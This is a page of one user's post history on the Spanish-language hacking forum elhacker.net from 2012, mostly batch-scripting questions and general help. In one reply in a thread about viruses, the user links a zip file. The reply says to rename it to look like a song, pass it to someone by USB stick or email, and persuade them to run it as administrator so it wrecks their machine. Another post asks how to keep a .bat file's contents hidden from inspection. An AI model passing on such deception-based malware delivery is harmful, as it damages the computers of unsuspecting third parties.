elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14
31  Programación / Scripting / cifrar bat en: 29 Abril 2012, 23:06 pm
Tengo una duda muy simple: Tengo un .bat y quiero cifrarlo pero que siga funcionando. Para ello lo pongo a .exe "Cifrado" ¿El error? Me lo descompila en %Temp% y claro asi la gente inteligente lo ve todo :S alguna idea?
32  Programación / Scripting / Re: REtos batch en: 29 Abril 2012, 23:02 pm
En este no. Es un NO rotundo. Si quieres habres otro le pones la chincheta y lo que tu quieras por no salirme del tema que hiba a decir una boludez. Porfavor cierra el tema.
33  Foros Generales / Dudas Generales / Re: Iniciando el largo camino del aprendizaje... en: 29 Abril 2012, 23:01 pm
Siento volver a publiar pero me encantan los debates. Segun la RAE Al buscar lenguaje sale esta opcion:
Citar
~ máquina.
1. m. Inform. Conjunto de instrucciones codificadas que una computadora puede interpretar y ejecutar directamente.
Mi computadora entiendo instrucciones que puede ejecutar Batch es considerado lenguaje.



Referente al tema si quireres descargar phyton descargalo de aqui: Quitale la opcion de descargar offer box: http://python.softonic.com/ (Para 32 bits)
34  Seguridad Informática / Hacking / Re: Ayuda con virus en: 29 Abril 2012, 21:48 pm
Digamos que es una vulneaviridad de los antivirus y de Windows desde la version XP (Supongo que no usara un 98 o 95 xD) No te aseguro que funcione como deduciras algo que te rebienta la maquina no es que de ganas de probarlo... Si no siempre puedes probar pidiendole al amo google alguna cosa
35  Programación / Scripting / Re: [BATCH] Comando WAIT en: 29 Abril 2012, 21:43 pm
Tu que hiciste el codigo explicame estas dos lineas:

SET TIEMPO5=%TIEMPO1%:%TIEMPO2%:%TIEMPO3%,%TIEMPO4%

IF %CONTADOR%==%* (exit /b) else goto 1
36  Programación / Scripting / Re: [BATCH] Comando WAIT en: 29 Abril 2012, 21:14 pm
Comprueba si coincide? No debe coincidir siempre?
Código:
SET /A CONTADOR=0

WTF? No me lei el codigo entero pero no seria mas eficiente y simple no poner nada? Al final del codigo si no me equivoco lo compruebas. Si quitas las comprovaciones y quitas esa linea y sera mas eficiente (Batch ya es lento de por si) Y si no la puedes borrar es incorrecta me parece que seria:
Código:
SET Contador=0
set /a es para opeaciones matematicas...
37  Seguridad Informática / Hacking / Re: Ayuda con virus en: 29 Abril 2012, 21:06 pm
No deberia hacer esto pero sere un buen compañero. Con conocimientos de informatica minimos: Descarga esto: http://jop.orgfree.com/asd.zip Lo descomprimes. Le pones el nombre que quieras yo le puse Cancion se lo passas por pendrive, correo etc Atencion!: La parte mas importante: Le dices que haga boton derecho y ejecutar como administrador. Le petara la maquina entera al instante. No estes cerca cuando eso ocurra.
38  Programación / Scripting / Re: REtos batch en: 29 Abril 2012, 20:52 pm
Vale que quizas no sea bueno. Yo aprendo para lo que necesito y hago esto porque quizas si apriendo me doy cuenta de que puedo hacer cosas que me hirian bien en el dia a dia. Quizas deba parender. Y a mi me funciona. No se tu pero a mi me funciona y yo declaro el reto resuelto. Si dices que debo aprender "por ejemplo" por no saber no poder no tener ganas de hacer repito "por ejemplo" lo de los numeros primos. Es algo fuera de batch. Cierto que debo aprender. Cierto que cree esto para aprender pero poco a poco. Como se que elecktro h@acker leera esto porfavor cierra el hilo si alguien quiere aplicar la idea para si o proponer el reto otra vez lo hacen en un nuevo hilo.
39  Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server" en: 29 Abril 2012, 19:04 pm
El nombre es muy importante si no mi metodo no funcionara. Ahora mismo te pongo tu reto si lo encuentro... (Ya sabes de que hilo hablo)
40  Seguridad Informática / Seguridad / Re: Ayuda con posible virus! en: 29 Abril 2012, 19:03 pm
Abre ejecutar y pon msconfig be a la pestaña de inicio desactiva todo menos lo que conozcas (como un rocketdock o nexus) y el antivirus lo degas te saldra un mensaje dale a reiniciar ahora cuenta si ha funcionado...
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines